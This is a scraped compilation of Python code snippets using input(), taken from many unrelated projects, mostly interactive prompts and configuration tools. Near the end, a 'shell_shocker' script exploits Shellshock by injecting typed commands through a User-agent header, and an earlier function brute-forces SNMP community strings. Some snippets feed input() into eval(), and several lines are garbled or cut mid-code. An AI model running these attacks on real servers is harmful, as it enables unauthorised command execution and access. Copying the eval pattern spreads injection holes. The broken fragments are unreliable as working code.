def build_browser():
    """Parse opts and run a BrowerBuilder."""
    parser = get_parser()
    (opts, args) = parser.parse_args()

    if opts.cluster is None:
        opts.cluster = input('Cluster IP or hostname: ')

    if opts.debug:
        log_lvl = logging.DEBUG
        logging.getLogger("urllib3").setLevel(logging.INFO)
    else:
        log_lvl = logging.INFO
        logging.getLogger("urllib3").setLevel(logging.WARNING)
    if opts.logfile:
        logging.basicConfig(level=log_lvl, datefmt='%Y-%m-%dT%H:%M:%S',
                            format='%(asctime)s [%(levelname)s] %(message)s',
                            filename=opts.logfile)
    else:
        logging.basicConfig(level=log_lvl, datefmt='%Y-%m-%dT%H:%M:%S',
                            format='%(asctime)s [%(levelname)s] %(message)s')

    if not opts.username:
        opts.username = input('Cluster username: ')
    if not opts.password:
        opts.password = getpass.getpass()
    store_ip = not opts.anon_ip
    bb = BrowserBuilder(opts.cluster, opts.username, opts.password, store_ip)
    bb.build_browser()
示例#2
0
文件: user.py 项目: Raphux/passhport
def prompt_create():
    """Prompt user to obtain data for request"""
    name = input("Name: ")
    sshkey = input("SSH Key: ")
    comment = input("Comment: ")

    return {"<name>": name, "<sshkey>": sshkey, "--comment": comment}
示例#3
0
def Initialize(config=None, token=None):
  """Initialize or update a GRR configuration."""

  print("Checking write access on config %s" % config["Config.writeback"])
  if not os.access(config.parser.filename, os.W_OK):
    raise IOError("Config not writeable (need sudo?)")

  print("\nStep 0: Importing Configuration from previous installation.")
  options_imported = 0
  prev_config_file = config.Get("ConfigUpdater.old_config", default=None)
  if prev_config_file and os.access(prev_config_file, os.R_OK):
    print("Found config file %s." % prev_config_file)
    if input("Do you want to import this configuration?"
             " [yN]: ").upper() == "Y":
      options_imported = ImportConfig(prev_config_file, config)
  else:
    print("No old config file found.")

  print("\nStep 1: Key Generation")
  if config.Get("PrivateKeys.server_key", default=None):
    if options_imported > 0:
      print("Since you have imported keys from another installation in the "
            "last step,\nyou probably do not want to generate new keys now.")
    if (input("You already have keys in your config, do you want to"
              " overwrite them? [yN]: ").upper() or "N") == "Y":
      GenerateKeys(config, overwrite_keys=True)
  else:
    GenerateKeys(config)

  print("\nStep 2: Setting Basic Configuration Parameters")
  ConfigureBaseOptions(config)
  AddUsers(token=token)
  ManageBinaries(config, token=token)
  print("\nGRR Initialization complete!\n")
示例#4
0
def letter_menu(donors):
    donor_name = None  # for static inspections
    donation_amount = None

    while True:
        user_input = input("Input donor name (or 'back', 'list'): ").strip()
        if user_input.lower() == "back":
            return
        elif user_input.lower() == "list":
            print(make_donor_list(donors))
            continue
        elif not user_input:
            # empty string, ask again
            continue
        # user_input is now the donor's name
        donor_name = user_input
        break

    while True:
        user_input = input("Enter donation amount ('back'): ").strip()
        if user_input.lower() == "back":
            return  # back to main menu
        if not user_input:
            continue

        donation_amount = parse_donation_amount(user_input)
        if not donation_amount:
            print("'{}' is not a valid donation amount!".format(user_input))
            continue
        else:
            break

    donors.add_donation(donor_name, donation_amount)
    print(make_thank_you(donor_name, donation_amount))
示例#5
0
def prompt_rmuser():
    """Prompt user to obtain data to remove a user"""
    username = input("Username: "******"Usergroupname: ")

    return {"<username>": username,
            "<usergroupname>": usergroupname}
示例#6
0
def prompt_addusergroup():
    """Prompt user to obtain data to add a usergroup"""
    subusergroupname = input("Subusergroupname: ")
    usergroupname = input("Usergroupname: ")

    return {"<subusergroupname>": subusergroupname,
            "<usergroupname>": usergroupname}
示例#7
0
def reset_retriever(scope):
    """Remove stored information on scripts, data, and connections"""

    warning_messages = {
        'all': "\nThis will remove existing scripts, cached data, and information on database connections. \nSpecifically it will remove the scripts and raw_data folders and the connections.config file in {}. \nDo you want to proceed? (y/N)\n",
        'scripts': "\nThis will remove existing scripts. \nSpecifically it will remove the scripts folder in {}.\nDo you want to proceed? (y/N)\n",
        'data': "\nThis will remove raw data cached by the Retriever. \nSpecifically it will remove the raw_data folder in {}. \nDo you want to proceed? (y/N)\n",
        'connections': "\nThis will remove stored information on database connections. \nSpecifically it will remove the connections.config file in {}. \nDo you want to proceed? (y/N)\n"
    }

    path = os.path.normpath(HOME_DIR)
    warn_msg = warning_messages[scope].format(path)
    confirm = input(warn_msg)
    while not (confirm.lower() in ['y', 'n', '']):
        print("Please enter either y or n.")
        confirm = input()
    if confirm.lower() == 'y':
        if scope in ['data', 'all']:
            shutil.rmtree(os.path.join(path, 'raw_data'))
        if scope in ['scripts', 'all']:
            shutil.rmtree(os.path.join(path, 'scripts'))
        if scope in ['connections', 'all']:
            try:
                os.remove(os.path.join(path, 'connections.config'))
            except:
                pass
示例#8
0
 def tune(self, freq, power_lvl_dbm):
     """
     Ask the user to set the TX frequency. Once the user continues, the
     assumption is that we can start RXing.
     """
     input("Please tune the signal generator to {:.3f} MHz and {:.1f} dBm, "
           "then press Enter".format(freq / 1e6, power_lvl_dbm))
示例#9
0
    def setup(self, args, positional):
        ModTool.setup(self, args, positional)

        if ((self._skip_subdirs['lib'] and self._info['lang'] == 'cpp') or
                (self._skip_subdirs['python'] and self._info['lang'] == 'python')):
            raise ModToolException('Missing or skipping relevant subdir.')

        # first make sure the old block name is provided
        self._info['oldname'] = args.old_name
        if self._info['oldname'] is None:
            if len(positional) >= 2:
                self._info['oldname'] = positional[1]
            else:
                self._info['oldname'] = input("Enter name of block/code to rename (without module name prefix): ")
        if not re.match('[a-zA-Z0-9_]+', self._info['oldname']):
            raise ModToolException('Invalid block name.')
        print("Block/code to rename identifier: " + self._info['oldname'])
        self._info['fulloldname'] = self._info['modname'] + '_' + self._info['oldname']

        # now get the new block name
        self._info['newname'] = args.new_name
        if self._info['newname'] is None:
            if len(positional) >= 2:
                self._info['newname'] = positional[2]
            else:
                self._info['newname'] = input("Enter name of block/code (without module name prefix): ")
        if not re.match('[a-zA-Z0-9_]+', self._info['newname']):
            raise ModToolException('Invalid block name.')
        print("Block/code identifier: " + self._info['newname'])
        self._info['fullnewname'] = self._info['modname'] + '_' + self._info['newname']
示例#10
0
def create_esp_surfaces(Molecule):
    Rads = [VdW99[i] for i in Molecule.elem]
    #xyz = Molecule.xyzs[0]
    na = Molecule.na
    printxyz=True
    np.set_printoptions(precision=10, linewidth=120)
    # Pass 1: This will determine the number of ESP points.
    num_esp = []
    for i, xyz in enumerate(Molecule.xyzs):
        print("Generating grid points for snapshot %i\r" % i)
        num_esp_shell = []
        for j in [1.4, 1.6, 1.8, 2.0]:
            Radii = list(np.array(Rads)*j)
            vfloat = drive_msms(xyz, Radii, 20.0/j)
            if len(vfloat) < na:
                warn_press_key("I generated less ESP points than atoms!")
            num_esp_shell.append(len(vfloat))
        num_esp.append(num_esp_shell)

    num_esp = np.array(num_esp)
    num_pts = np.amin(num_esp,axis=0) / 100
    print("Number of points: ", num_pts)
    input()
    # We do not store.
    # Pass 2: This will actually print out the ESP grids.
    Mol_ESP = []
    for i, xyz in enumerate(Molecule.xyzs):
        esp_pts = []
        for sh, j in enumerate([1.4, 1.6, 1.8, 2.0]):
            Radii = list(np.array(Rads)*j)
            vfloat = drive_msms(xyz, Radii, 20.0/j)

            # print "Calling MSMS"
            # MS = MSMS(coords = list(xyz), radii = Radii)
            # print "Computing"
            # MS.compute(density=20.0/j)
            # print "Getting triangles"
            # vfloat, vint, tri = MS.getTriangles()
            # #vfloat = vfloat_shell[sh]
            a = list(range(len(vfloat)))
            random.shuffle(a)
            # We'll be careful and generate lots of ESP points, mm.
            # But we can't have a different number of points per snapshots, mm.
            for idx in a[:num_pts[sh]]:
                esp_pts.append(vfloat[idx][:3])
        if printxyz:
            Out = []
            Out.append("%i" % (len(xyz) + len(esp_pts)))
            Out.append("Molecule plus ESP points (heliums)")
            for j, x in enumerate(xyz):
                Out.append(format_xyz_coord(Molecule.elem[j], x))
            for esp_pt in esp_pts:
                Out.append(format_xyz_coord('He',esp_pt))
            fout = open('molecule_esp.xyz','w' if i == 0 else 'a')
            for line in Out:
                print(line, file=fout)
            fout.close()
        Mol_ESP.append(esp_pts)

    return Mol_ESP
示例#11
0
def prompt_adduser():
    """Prompt user to obtain data to add a user"""
    username = input("Username: "******"Targetgroupname: ")

    return {"<username>": username,
            "<targetgroupname>": targetgroupname}
示例#12
0
def prompt_addtarget():
    """Prompt user to obtain data to add a target"""
    targetname = input("Targetname: ")
    targetgroupname = input("Targetgroupname: ")

    return {"<targetname>": targetname,
            "<targetgroupname>": targetgroupname}
示例#13
0
def prompt_rmusergroup():
    """Prompt user to obtain data to remove a usergroup"""
    usergroupname = input("Usergroupname: ")
    targetgroupname = input("Targetgroupname: ")

    return {"<usergroupname>": usergroupname,
            "<targetgroupname>": targetgroupname}
示例#14
0
def prompt_rmtargetgroup():
    """Prompt user to obtain data to remove a targetgroup"""
    subtargetgroupname = input("Subtargetgroupname: ")
    targetgroupname = input("Targetgroupname: ")

    return {"<subtargetgroupname>": subtargetgroupname,
            "<targetgroupname>": targetgroupname}
示例#15
0
def main():
    """
    Welcome to the thellier-thellier experiment automatic chart maker.   
    Please select desired step interval and upper bound for which it is valid.
    e.g.,   
    50 
    500
    10 
    600
    
    a blank entry signals the end of data entry.
    which would generate steps with 50 degree intervals up to 500, followed by 10 degree intervals up to 600.   
    
    chart is stored in:  chart.txt
    """
    print(main.__doc__)
    if '-h' in sys.argv:sys.exit() 
    cont,Int,Top=1,[],[]
    while cont==1:
        try: 
            Int.append(int(input(" Enter desired treatment step interval: <return> to quit ")))
            Top.append(int(input(" Enter upper bound for this interval: ")))
        except:
            cont=0
    pmag.chart_maker(Int,Top)
示例#16
0
  def __call__(self, parser, namespace, values, option_string):
    # I know this import looks out of place but importing readline has side effects (namely,
    # enabling readline support for all input), so I import it here so at least the side effects
    # are restricted to this method call and not importing this module.
    import readline
    for arg in parser.interactive_args:
      required = arg.get('was_required', False)
      is_boolean = arg.get('action') in ('store_true', 'store_false')

      maybe_default = '(default={})'.format(arg['default']) if 'default' in arg else None
      maybe_optional = '[optional]' if (not required and not is_boolean) else None
      maybe_boolean = '[Y/n]' if is_boolean else None

      modifiers = filter(lambda x: x, [maybe_default, maybe_optional, maybe_boolean])
      prompt = colors.bold('{}{}{}? '.format(
        arg['help'],
        (' ' if len(modifiers) > 0 else ''),  # Space if modifiers nonempty
        ' '.join(modifiers)
      ))
      value = input(prompt)
      # Repeat while input is invalid.
      while (
        (value.strip() == '' and required) or
        (is_boolean and self._convert_to_boolean(value) is None)
      ):
        value = input(prompt)
      if is_boolean:
        value = self._convert_to_boolean(value)
      elif not required:
        value = value or None  # Convert the empty string to None.
      python_name = InteractiveArgumentParser._convert_to_python_name(arg['name'])
      setattr(namespace, python_name, value)
def getEssay(soup, topic):
    topic_content = soup.find('h2')
    user_input = ''
    essay_text = ''

    while user_input != 'stop':
        user_input = eval(input(topic_content))
        if user_input == 's':
            topic_content = topic_content.find_next('h2')
        elif user_input == 'n':
            topic_content = topic_content.find_next()
        elif user_input == 'y':
            if topic_content.name == 'h2':
                topic_content.name = 'h3'
            elif topic_content.name == 'h3':
                topic_content.name = 'h4'
            elif topic_content.name == 'h5':
                topic.content.name = 'h6'
            elif topic_content.name == 'h6':
                topic_content.name = 'b'
            essay_text = essay_text + str(topic_content)
            topic_content = topic_content.find_next()
        else: 
            user_input = eval(input('whoops, try again'))

    e = Exhibit(title=soup.h1.string, slug=slugify(soup.h1.string), essay=essay_text, scraped_from=topic)
    e.save()
    return e
示例#18
0
def get_dc_params(FIRST_GET_DC, specimen, treat_type, yn):
    if FIRST_GET_DC:
        yn = input("Is the DC field used in this IZZI study constant or does it varry between specimen or step? (y=const) [y/N]: ")
        FIRST_GET_DC = False
    if "y" == yn: DC_FIELD,DC_PHI,DC_THETA = list(map(float, eval(input("What DC field, Phi, and Theta was used for all steps? (float (in microTesla),float,float): ")))); GET_DC_PARAMS=False
    else: DC_FIELD,DC_PHI,DC_THETA = list(map(float,eval(input("What DC field, Phi, and Theta was used for specimen %s and step %s? (float (in microTesla),float,float): "%(str(specimen),str(treat_type))))))
    return GET_DC_PARAMS,FIRST_GET_DC,yn,DC_FIELD*1e-6,DC_PHI,DC_THETA
示例#19
0
def boolean_input_prompt(message):
    if sys.version_info >= (3, 0, 0):
        result = input(message)
    else:
        result = input(message)
    result = result.upper()
    return result == "Y" or result == "YES" or result == "T" or result == "TRUE"
示例#20
0
def get_dc_params(FIRST_GET_DC, specimen, treat_type, yn):
    """
    Prompts user for DC field data if not provided, just an encapsulation function for the above program and should not be used elsewhere.

    Parameters
    -----------
    FIRST_GET_DC : is this the first time you are asking for DC data?
    specimen : what specimen do you want DC data for?
    treat_type : what kind of step was it? PTM, Tail, in field, zero field?
    yn : is DC field constant or varrying? (y = constant, n = varrying)

    Returns
    -----------
    GET_DC_PARAMS : weather or not to rerun this function
    FIRST_GET_DC : same as above
    yn : same as above
    DC_FIELD : field strength in Tesla
    DC_PHI : field azimuth
    DC_THETA : field polar angle
    """
    if FIRST_GET_DC:
        yn = input("Is the DC field used in this IZZI study constant or does it varry between specimen or step? (y=const) [y/N]: ")
        FIRST_GET_DC = False
    if "y" == yn: DC_FIELD,DC_PHI,DC_THETA = list(map(float, eval(input("What DC field, Phi, and Theta was used for all steps? (float (in microTesla),float,float): ")))); GET_DC_PARAMS=False
    else: DC_FIELD,DC_PHI,DC_THETA = list(map(float,eval(input("What DC field, Phi, and Theta was used for specimen %s and step %s? (float (in microTesla),float,float): "%(str(specimen),str(treat_type))))))
    return GET_DC_PARAMS,FIRST_GET_DC,yn,DC_FIELD*1e-6,DC_PHI,DC_THETA
示例#21
0
    def check_valve(self, tank):

        self.lld.valve_switch(tank, False)
        assert(input("Is valve "+ tank.tank_name +" OFF ? [y/n]") == "y")

        self.lld.valve_switch(tank, True)
        assert(input("Is valve "+tank.tank_name+" ON ? [y/n]") == "y")
示例#22
0
def readSExtractor(filename):
    with pyfits.open(filename) as pf:
        for hdu in pf:
            if hdu.name == "PRIMARY":
                pass
            elif hdu.name == "LDAC_IMHEAD":
                hdr = hdu.data[0][0]    # the fits header from the original fits image
                print(hdr[3])
            elif hdu.name == "LDAC_OBJECTS":
                print("%d objects" % (len(hdu.data)))
                # Find the VIGNET column
                ttype = [k for k, v in hdu.header.items() if v == "VIGNET"]
                if not ttype:
                    raise RuntimeError("Unable to find a VIGNET column")
                vignetCol = int(re.search(r"^TTYPE(\d+)$", ttype[0]).group(1)) - 1

                for row in range(len(hdu.data)):
                    pixelData = hdu.data[row][vignetCol]
                    bad = np.where(pixelData < -1e29)
                    sat = np.where(pixelData > 99e3)
                    pixelData[bad] = 0.0
                    mi = afwImage.MaskedImageF(*hdu.data[row][vignetCol].shape)
                    im = mi.getImage()
                    im.getArray()[:] = pixelData
                    msk = mi.getMask().getArray()
                    msk[bad] = afwImage.MaskU.getPlaneBitMask("BAD")
                    msk[sat] = afwImage.MaskU.getPlaneBitMask("SAT")
                    ds9.mtv(mi, title=row)
                    input("Next ")
示例#23
0
def configure(consumer_key, sort_field, words_per_minute):
    pocket_app.init_consumer_key(consumer_key)

    request_token = pocket_app.get_request_token()

    if not request_token:
        print('Could not obtain request_token')
        return

    url = 'http://getpocket.com/auth/authorize?request_token={0}' \
          '&redirect_uri={1}'.format(request_token, 'http://www.google.com')

    print('You will have to authorize the application to access your articles')
    print('Enter any key once you\'re redirected to google.com')
    webbrowser.open_new_tab(url)
    input()

    access_token = pocket_app.get_access_token(request_token)

    if not access_token:
        print('Could not obtain access token')
        return

    pocket_app.configure(consumer_key, access_token,
                         words_per_minute, sort_field)
    print('The application is ready to use')
示例#24
0
文件: ui.py 项目: leyyin/university
    def __buy(self):
        """
        Handle buy command
        Input:
        Output:
        
        """

        # get the name and quantity from the user
        print("Buy Product")
        name = input("Product name: ").strip()
        qty = input("Product quantity: ").strip()
        try:
            qty = int(qty)
        except ValueError:
            print("Quantity is not a number please try again")
            return

        # find the product instance by name
        products = self.__pController.filterByName(name)
        # if empty do nothing
        if not products:
            print("There are no products with that name")
            return

        # if found use the first product with that name
        self.__pController.addProductToCart(products[0], qty)
        print("Product added")
def main(loadfile=None, savefile=None):
    Xtrain, Ytrain, Xtest, Ytest = getKaggleMNIST()
    if loadfile:
        dbn = DBN.load(loadfile)
    else:
        dbn = DBN([1000, 750, 500, 10]) # AutoEncoder is default
        # dbn = DBN([1000, 750, 500, 10], UnsupervisedModel=RBM)
        dbn.fit(Xtrain, pretrain_epochs=2)

    if savefile:
        dbn.save(savefile)

    # first layer features
    # initial weight is D x M
    W = dbn.hidden_layers[0].W.eval()
    for i in range(dbn.hidden_layers[0].M):
        imgplot = plt.imshow(W[:,i].reshape(28, 28), cmap='gray')
        plt.show()
        should_quit = input("Show more? Enter 'n' to quit\n")
        if should_quit == 'n':
            break

    # features learned in the last layer
    for k in range(dbn.hidden_layers[-1].M):
        # activate the kth node
        X = dbn.fit_to_input(k)
        imgplot = plt.imshow(X.reshape(28, 28), cmap='gray')
        plt.show()
        if k < dbn.hidden_layers[-1].M - 1:
            should_quit = input("Show more? Enter 'n' to quit\n")
            if should_quit == 'n':
                break
示例#26
0
def main():
    if "-h" in sys.argv:
        help(__name__)
        sys.exit()
    if "-i" in sys.argv: # interactive
        dir_path = "."
        dataset, datasets, filenames = [], [], []
        data_model = 3
        while True:
            infile=input('\n\n Enter magic files for combining, <return>  when done: ')
            if infile=='':
                break
            if os.path.isfile(infile):
                filenames.append(os.path.realpath(infile))
            else:
                print("-W- You have not provided a valid filename.\nIf the file is not in your current working directory, you will need to provide the full path to the file")
        outfile = input('\n\n Enter name for new combined file: ')
        filenames = str(", ".join(filenames))
        if not outfile:
            return False
    else: # non-interactive
        dataframe = extractor.command_line_dataframe([["F", True, ''], ["dm", False, 3]])
        args = extractor.extract_and_check_args(sys.argv, dataframe)
        data_model, dir_path, outfile, filenames = extractor.get_vars(["dm","WD", "F", "f"], args)
    combine(filenames,outfile,dir_path,data_model)
示例#27
0
def dictionary_attack(dict, ip_target, interface):
    f=open(dict, "r")
    content = f.read()
    communities = content.split("\n")
    communities_number = len(communities)
    i = 0
    cont = "y"
    found = False
    six.print_("[*] SNMP Dictionary attack STARTED")
    while cont == "y" and i < communities_number:
        response = get(ip_target, "1.3.6.1.2.1.1.1.0", interface, communities[i], 0.15)
        if response != None:
            if response.haslayer(SNMPresponse):
                if response[SNMPresponse].error == 0:
                    found = True
                    six.print_(colored("[*] Read-Only community string found!! - '" + communities[i] + "'", "green"))
                    cont = "x"
                    while cont != "y" and cont != "n":
                        cont = input("Do you want to continue? (y/n): ")

        response = set(ip_target, "1.3.6.1.2.1.1.6.0", "Location", communities[i], interface, 0.15)
        if response != None:
            if response.haslayer(SNMPresponse):
                if response[SNMPresponse].error == 0:
                    found = True
                    six.print_(colored("[*] Read-Write community string found!! - '" + communities[i] + "'", "green"))
                    cont = "x"
                    while cont != "y" and cont != "n":
                        cont = input("Do you want to continue? (y/n): ")

        i += 1
    six.print_("[*] SNMP Dictionary attack finished. " + str(i) + " community strings tried.")
    if i == communities_number and not found:
        six.print_("[*] No community strings matches found")
示例#28
0
    def _implicitBuildMatrix_(self, SparseMatrix, L, id1, id2, b, weight, var, boundaryConditions, interiorFaces, dt):
        mesh = var.mesh
        coeffMatrix = self._getCoeffMatrix_(var, weight)

        id1 = self._reshapeIDs(var, id1)
        id2 = self._reshapeIDs(var, id2)

        L.addAt(numerix.take(coeffMatrix['cell 1 diag'], interiorFaces, axis=-1).ravel(), id1.ravel(), id1.swapaxes(0, 1).ravel())
        L.addAt(numerix.take(coeffMatrix['cell 1 offdiag'], interiorFaces, axis=-1).ravel(), id1.ravel(), id2.swapaxes(0, 1).ravel())
        L.addAt(numerix.take(coeffMatrix['cell 2 offdiag'], interiorFaces, axis=-1).ravel(), id2.ravel(), id1.swapaxes(0, 1).ravel())
        L.addAt(numerix.take(coeffMatrix['cell 2 diag'], interiorFaces, axis=-1).ravel(), id2.ravel(), id2.swapaxes(0, 1).ravel())

        N = mesh.numberOfCells
        M = mesh._maxFacesPerCell

        for boundaryCondition in boundaryConditions:
            LL, bb = boundaryCondition._buildMatrix(SparseMatrix, N, M, coeffMatrix)

            if 'FIPY_DISPLAY_MATRIX' in os.environ:
                self._viewer.title = r"%s %s" % (boundaryCondition.__class__.__name__, self.__class__.__name__)
                self._viewer.plot(matrix=LL, RHSvector=bb)
                from fipy import raw_input
                input()

            L += LL
            b += bb
示例#29
0
def _handle_command(command, config, command_options, log):
    if command == Config.Command.update.name:
        config.update()

    elif command == Config.Command.list.name:
        config.list()

    elif command == Config.Command.details.name:
        sub_index = _choose_sub(config)
        config.details(sub_index)
        input("Press enter when done.")

    elif command == Config.Command.download_queue.name:
        sub_index = _choose_sub(config)
        config.download_queue(sub_index)

    # TODO this needs work.
    elif command == Config.Command.enqueue.name:
        (sub_index, entry_nums) = _sub_list_command_wrapper(config, command, log)
        config.enqueue(sub_index, entry_nums)

    elif command == Config.Command.mark.name:
        (sub_index, entry_nums) = _sub_list_command_wrapper(config, command, log)
        config.mark(sub_index, entry_nums)

    elif command == Config.Command.unmark.name:
        (sub_index, entry_nums) = _sub_list_command_wrapper(config, command, log)
        config.unmark(sub_index, entry_nums)

    else:
        log.error("Unknown command. Allowed commands are:")
        for command in command_options:
            log.error("    {}: {}".format(command["return"], command["prompt"]))
        return
示例#30
0
def get_files(ctx, nginx_dir, yes):
    """
    Find nginx configuration files, and ask user to add a challenge section
    """
    step1_a = "First, you need to modify some/all of these nginx config files:\n\n"
    step1_b = "\n\nAdd the next part to a file's `server` section:\n%s" % NGINX_CHALLENGE
    step1_c = "\n-- WARNING! you have yet to modify the following files:\n"
    step1_d = "You should now restart/reload your nginx server.\n"
    enter_prompt = "Press Enter when done..."

    all_file_list, formatted_list = get_nginx_files(nginx_dir)

    first = None
    while True:
        if not first:
            click.echo(''.join([step1_a, formatted_list, step1_b]))
            input(enter_prompt)
            first = True
            continue
        unmodified_files, formatted_list = get_nginx_files(nginx_dir, skip_modified=True)
        click.echo(''.join([step1_c, formatted_list]))
        wat = yes or input("Do you want to skip these files? [Y/quit]").lower()[:1]
        if wat in ['y', '', True]:
            break
        elif wat == 'q':
            ctx.exit('Please run me again to start over')
        else:
            continue

    click.echo(step1_d)
    input(enter_prompt)

    return list(set(all_file_list) - set(unmodified_files))
                        augment=False,
                        margin=5,
                        batch_size=2,
                        seq_len=20,
                        num_of_persons=len(dataset.get_persons()))
saver = tf.train.Saver()
tf.global_variables_initializer().run()

load = False
model_ckpt = './weights/' + model_name + '.ckpt.meta'

if os.path.isfile(model_ckpt):
    input_var = None
    while input_var not in ['yes', 'no']:
        input_var = input(
            "We found model files. Do you want to load it and continue training [yes/no]?"
        )
    if input_var == 'yes':
        load = True

if load:
    saver.restore(sess, './weights/' + model_name + '.ckpt')

batch_size = 2

batch_x1, batch_x2, batch_y, x2_labels, x1_labels = dataset.get_batch(
    training=siamese.training,
    optical_flow=siamese.optical_flow,
    batch_size=siamese.batch_size,
    seq_len=siamese.seq_len,
    augment=siamese.augment)
示例#32
0
if (port == None): port = 8080

#
# The host data structure will be a 3-element array of:
#
#     [<hostname>, <api-handle>, <map-cache-contents>]
#
hosts = []
if (len(sys.argv) > 1):
    args = sys.argv[1::]
    for host in args:
        hosts.append([host, None, None])
else:
    if (require_input):
        while (True):
            host = input("Enter hostname (enter return when done): ")
            if (host == ""): break
            hosts.append([host, None, None])
        #endwhile
    else:
        hosts.append(["localhost", None, None])
    #endif
#endif

print("Connecting to APIs ...", end=" ")
sys.stdout.flush()

#
# Open API with each hostname. Store in 2-element of array.
#
for host in hosts:
# ~$ /bin/ls /
# bin
# boot
# dev
# etc
# ..
# ~$ /bin/cat /etc/passwd

from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
import sys, urllib.request, urllib.error, urllib.parse

if len(sys.argv) != 2:
        print("Usage: shell_shocker <URL>")
        sys.exit(0)

URL=sys.argv[1]
print("[+] Attempting Shell_Shock - Make sure to type full path")

while True:
        command=input("~$ ")
        opener=urllib.request.build_opener()
        opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
        try:
                response=opener.open(URL)
                for line in response.readlines():
                        print(line.strip())
        except Exception as e: print(e)
示例#34
0
         "'release %s'" % versionStr],
        cwd=VERSIONS)

    print("'versions' tags are now:",
          subprocess.check_output(["git", "tag"], cwd=VERSIONS).split())
    ok = subprocess.call(["git", "push", "%s" % versionStr], cwd=VERSIONS)
    if ok:
        print("Successfully pushed tag %s upstream" % versionStr)
    else:
        print("Failed to push tag %s upstream" % versionStr)

    # revert the __init__ file to non-ditribution state
    print('reverting the main master branch: git reset --hard HEAD')
    print(subprocess.check_output(["git", "reset", "--hard", "HEAD"],
                                  cwd=MAIN))
    return True  # success


if __name__ == "__main__":
    if "--noCommit" in sys.argv:
        noCommit = True
    else:
        noCommit = False
    if "--noInteractive" not in sys.argv:
        interactive = True
    else:
        interactive = False
    # todo: update versions first
    versionStr = input("version:")
    buildRelease(versionStr, noCommit=noCommit, interactive=interactive)
from shutil import copyfile
import sys  #for exiting if there's a problem
import os  #to check if files exist
import re  #for stripping file endings, etc.
import pandas as pd
import json  #for grant reporting
import input_specimens as inspec

#for safety, save an original version of the configuration file with all the notes.
copyfile('user_configuration.py', 'user_configuration_original.py')
File = open('user_configuration.py', 'w')

#%% Get going.
#path to folder where all your inputs are stored
INPUT_PATH = eval(
    input('\nType the path to the folder where all your inputs are stored.'))
File.write(f'INPUT_PATH = "{INPUT_PATH}"')

UPLOAD_FOLDER = eval(
    input('Type the name of the folder containing files to batch upload.'))
File.write(f'\nUPLOAD_FOLDER = "{UPLOAD_FOLDER}"')

CtMetaFolder = eval(
    input("\nDo you have a folder of CT metadata files? [y/n]"))
if CtMetaFolder == 'y':
    CT_METADATA_FOLDER = eval(
        input('Type the name of the folder of CT metadata files.'))
    File.write(f'\nCT_METADATA_FOLDER = "{CT_METADATA_FOLDER}"')
if CtMetaFolder == 'n':
    CT_METADATA_FOLDER = None
    File.write(f'\nCT_METADATA_FOLDER = None')
示例#36
0
    def __init__(self, config=None):
        # Default config dictionary
        self._configuration = {'user': '******',
                               'resource_paths': ['~/pyiron/resources'],
                               'project_paths': ['~/pyiron/projects'],
                               'sql_connection_string': None,
                               'sql_table_name': 'jobs_pyiron',
                               'sql_view_connection_string': None,
                               'sql_view_table_name': None,
                               'sql_view_user': None,
                               'sql_view_user_key': None,
                               'sql_file': None,
                               'sql_host': None,
                               'sql_type': 'SQLite',
                               'sql_user_key': None,
                               'sql_database': None}
        environment_keys = os.environ.keys()
        if 'PYIRONCONFIG' in environment_keys:
            config_file = environment_keys['PYIRONCONFIG']
        else:
            config_file = os.path.expanduser(os.path.join("~", ".pyiron"))
        if os.path.isfile(config_file):
            self._config_parse_file(config_file)
        elif not any([env in environment_keys
                      for env in ['TRAVIS', 'APPVEYOR', 'CIRCLECI', 'CONDA_BUILD', 'GITLAB_CI']]):
            user_input = None
            while user_input not in ['yes', 'no']:
                user_input = input('It appears that pyiron is not yet configured, do you want to create a default start configuration (recommended: yes). [yes/no]:')
            if user_input.lower() == 'yes' or user_input.lower() == 'y':
                install_pyiron(config_file_name=config_file,
                               zip_file="resources.zip",
                               resource_directory="~/pyiron/resources",
                               giturl_for_zip_file="https://github.com/pyiron/pyiron-resources/archive/master.zip",
                               git_folder_name="pyiron-resources-master")
            else:
                raise ValueError('pyiron was not installed!')
            self._config_parse_file(config_file)

        # Take dictionary as primary source - overwrite everything
        if isinstance(config, dict):
            for key, value in config.items():
                if key not in ['resource_paths', 'project_paths'] or isinstance(value, list):
                    self._configuration[key] = value
                elif isinstance(value, str):
                    self._configuration[key] = [value]
                else:
                    TypeError('Config dictionary parameter type not recognized ', key, value)

        self._configuration['project_paths'] = [convert_path(path) + '/' if path[-1] != '/' else convert_path(path)
                                                for path in self._configuration['project_paths']]
        self._configuration['resource_paths'] = [convert_path(path)
                                                for path in self._configuration['resource_paths']]   

        # Build the SQLalchemy connection strings
        if self._configuration['sql_type'] == 'Postgres':
            self._configuration['sql_connection_string'] = 'postgresql://' + self._configuration['user'] + ':' \
                                                           + self._configuration['sql_user_key'] + '@' \
                                                           + self._configuration['sql_host'] \
                                                           + '/' + self._configuration['sql_database']
            if self._configuration['sql_view_user'] is not None:
                self._configuration['sql_view_connection_string'] = 'postgresql://' + \
                                                                    self._configuration['sql_view_user'] + ':' + \
                                                                    self._configuration['sql_view_user_key'] + '@' + \
                                                                    self._configuration['sql_host'] + '/' + \
                                                                    self._configuration['sql_database']
        elif self._configuration['sql_type'] == 'MySQL':
            self._configuration['sql_connection_string'] = 'mysql+pymysql://' + self._configuration['user'] + ':' \
                                                           + self._configuration['sql_user_key'] + '@' \
                                                           + self._configuration['sql_host'] \
                                                           + '/' + self._configuration['sql_database']
        else:
            # SQLite is raising ugly error messages when the database directory does not exist.
            if self._configuration['sql_file'] is None:
                self._configuration['sql_file'] = '/'.join([self._configuration['resource_paths'][0], 'sqlite.db'])
            if os.path.dirname(self._configuration['sql_file']) != '' and \
                    not os.path.exists(os.path.dirname(self._configuration['sql_file'])):
                os.makedirs(os.path.dirname(self._configuration['sql_file']))
            self._configuration['sql_connection_string'] = 'sqlite:///' + \
                                                           self._configuration['sql_file'].replace('\\', '/')

        self._database = None
        self._use_local_database = False
        self._queue_adapter = None
        self._queue_adapter = self._init_queue_adapter(resource_path_lst=self._configuration['resource_paths'])
        self.logger = setup_logger()
        self._publication_lst = {}
        self.publication_add(self.publication)
示例#37
0
and then recall them to test the data pickling mechanism

>>> data = dump.read(filename, f)
>>> newPhase = data['phase']
>>> newTheta = data['theta']
>>> newThetaEq = buildThetaEquation(newPhase, newTheta)
>>> newPhaseEq = buildPhaseEquation(newPhase, newTheta)

and finish the iterations,

>>> from builtins import range
>>> for i in range(steps // 2):
...     newTheta.updateOld()
